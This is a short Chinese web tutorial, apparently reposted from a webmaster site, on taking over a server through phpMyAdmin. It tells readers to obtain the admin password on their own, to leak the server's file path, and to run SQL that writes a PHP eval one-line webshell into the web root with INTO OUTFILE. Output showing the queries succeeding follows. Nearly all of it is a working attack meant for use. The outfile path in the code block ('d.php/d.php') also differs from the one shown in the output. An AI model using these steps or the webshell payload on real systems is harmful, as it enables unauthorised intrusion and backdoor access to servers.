教你phpMyAdmin 后臺(tái)拿webshell
發(fā)布日期:2021-12-21 02:03 | 文章來源:站長之家
1.如何拿到登陸密碼,自己想辦法。
2.訪問 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路徑.
3.選擇一個(gè)Database.運(yùn)行以下語句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.如果沒什么意外.對(duì)應(yīng)網(wǎng)站得到webshell
您運(yùn)行的 SQL 語句已經(jīng)成功運(yùn)行了。
SQL 查詢:
CREATE TABLE a(
cmd text NOT NULL
);# MySQL 返回的查詢結(jié)果為空(即零行)。
INSERT INTO a( cmd )
VALUES (
'<?php eval($_POST[1]);?>'
);# 影響列數(shù): 1
SELECT cmd
FROM a
INTO OUTFILE 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php';# 影響列數(shù): 1
DROP TABLE IF EXISTS a;# MySQL 返回的查詢結(jié)果為空(即零行)。
版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請(qǐng)保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場(chǎng),如有內(nèi)容涉嫌侵權(quán),請(qǐng)聯(lián)系alex-e#qq.com處理。
相關(guān)文章
關(guān)注官方微信